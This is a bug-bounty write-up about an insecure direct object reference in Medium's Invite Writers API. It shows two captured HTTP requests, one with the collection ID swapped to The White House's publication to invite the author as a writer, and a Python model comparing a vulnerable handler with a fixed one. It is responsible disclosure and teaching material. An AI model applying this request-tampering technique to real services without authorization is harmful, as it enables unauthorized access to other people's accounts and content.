(Header image from http://www.wellesley.edu)

While I was riding home in an Uber, I received an email from Medium about its 5 new features. One of those is the Invite Writers feature.

[Image: Invite Writers email from Medium]

New features mean there is a good chance of new security issues, so I started testing this one by inviting my second email address to my own publication to see how the feature works. While going through the invite flow, I opened an intercepting tool and captured the HTTP POST request:

POST /_/api/collections/62fcbc0a9209/invited-authors HTTP/1.1
Host: medium.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Obvious-CID: web
X-XSRF-Token: NDZnMsyhRddws0sV
X-Client-Date: 1479216955226
Content-Type: application/json
Referer: https://medium.com/secuna/edit
Content-Length: 41
Cookie: {Redacted}
Connection: close

{"email":"example@domain.com"}

Look at the request line and the value after /collections/: 62fcbc0a9209 is the Collection ID of Secuna, my own publication. A request that names its target object with a plain identifier like this is a classic candidate for Insecure Direct Object Reference, also known as IDOR, if the server never checks that the caller is actually allowed to act on that object. So, without hesitation, I searched for The White House's Medium publication and grabbed its Collection ID.

The White House's Collection ID: 51210352003f

After grabbing The White House's Collection ID, I modified the HTTP POST request, changing the Collection ID in the path from my publication's to The White House's:
POST /_/api/collections/51210352003f/invited-authors HTTP/1.1
Host: medium.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Obvious-CID: web
X-XSRF-Token: NDZnMsyhRddws0sV
X-Client-Date: 1479216955226
Content-Type: application/json
Referer: https://medium.com/secuna/edit
Content-Length: 41
Cookie: {Redacted}
Connection: close

{"email":"example@domain.com"}

Then I submitted the modified HTTP POST request and got a 200 OK response, which means I had successfully invited myself as a writer to The White House's Medium publication. Note that nothing else in the request changed: my own session cookie and my own X-XSRF-Token were still valid, because the server only checked that I was a logged-in user, not that I was an editor of the collection named in the URL. About 3 seconds later, I got an email from Medium with the invitation link.

[Image: Invitation link from The White House]

And wee!

After finding this severe security issue, I immediately reported it to Medium's security team. In just 9 hours they fixed it and rewarded me with a $250 bounty. I'm happy, yet a little sad at the same time, because they removed me from The White House's Medium publication (haha). Seriously, I am very happy that I helped Medium again make its platform more secure by finding and reporting security vulnerabilities. I'm also the one who found a bug that allowed updating and deleting any story on Medium.
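The root cause is easier to see in code than in two captured requests. The model below is an added example written for this post, not Medium's code: the session, editor store and handler signatures are assumptions made for illustration, and the only values taken from the write-up are the two collection IDs and the request shape (POST to /_/api/collections/<id>/invited-authors with an "email" body). It puts the vulnerable handler beside the fixed one so the difference, a single object-level authorization check, is explicit.

```python
"""Model of an invite-writers endpoint with and without object-level
authorization (IDOR).

Added example, not Medium's code. The Session/Collection model, user IDs
and token values are assumptions made for illustration; the collection
IDs 62fcbc0a9209 (Secuna) and 51210352003f (The White House) are the
ones quoted in the write-up.
"""
import secrets
from dataclasses import dataclass, field


@dataclass
class Collection:
    collection_id: str
    name: str
    editors: set                      # user IDs allowed to manage this publication
    invited: list = field(default_factory=list)


@dataclass
class Session:
    user_id: str
    xsrf_token: str                   # stands in for the X-XSRF-Token header


def fresh_state():
    """Constructed sample data: two publications with disjoint editor sets."""
    return {
        "62fcbc0a9209": Collection("62fcbc0a9209", "Secuna", {"researcher"}),
        "51210352003f": Collection("51210352003f", "The White House", {"wh-editor"}),
    }


def _authenticated(session, xsrf_header):
    """Session cookie + CSRF token establish *who* is calling, nothing about
    *what* they may touch. A logged-in attacker passes this with their own
    token, exactly as the replayed request did."""
    return session is not None and secrets.compare_digest(session.xsrf_token, xsrf_header)


def invite_author_vulnerable(state, session, xsrf_header, collection_id, body):
    """Authenticates the caller but trusts the collection ID from the URL."""
    if not _authenticated(session, xsrf_header):
        return 401, {"error": "unauthenticated"}
    coll = state.get(collection_id)
    if coll is None:
        return 404, {"error": "unknown collection"}
    # BUG: no check that session.user_id may manage *this* collection.
    coll.invited.append(body["email"])
    return 200, {"collectionId": collection_id, "invited": body["email"]}


def invite_author_fixed(state, session, xsrf_header, collection_id, body):
    """Same endpoint with the missing object-level authorization check."""
    if not _authenticated(session, xsrf_header):
        return 401, {"error": "unauthenticated"}
    coll = state.get(collection_id)
    if coll is None:
        return 404, {"error": "unknown collection"}
    # Membership is looked up server-side from the session's user, never
    # from anything the client sent.
    if session.user_id not in coll.editors:
        return 403, {"error": "forbidden"}
    coll.invited.append(body["email"])
    return 200, {"collectionId": collection_id, "invited": body["email"]}


def replay_attack(handler):
    """Replays the write-up's scenario: a user who edits only Secuna sends
    the invite request with The White House's collection ID in the path.
    Returns (status, The White House's invited list afterwards)."""
    state = fresh_state()
    attacker = Session(user_id="researcher", xsrf_token="example-xsrf-token")
    status, _ = handler(state, attacker, attacker.xsrf_token,
                        "51210352003f", {"email": "example@domain.com"})
    return status, list(state["51210352003f"].invited)


if __name__ == "__main__":
    print("vulnerable:", replay_attack(invite_author_vulnerable))
    print("fixed:     ", replay_attack(invite_author_fixed))
```

Run it and the vulnerable handler returns 200 with the attacker's address on The White House's invite list, while the fixed handler returns 403 and leaves the list empty. The fix deliberately answers 403 rather than 404: Medium collection IDs are already visible to anyone viewing a publication, so hiding their existence buys nothing, and a clear "forbidden" is easier to alert on than a "not found" that blends in with typos.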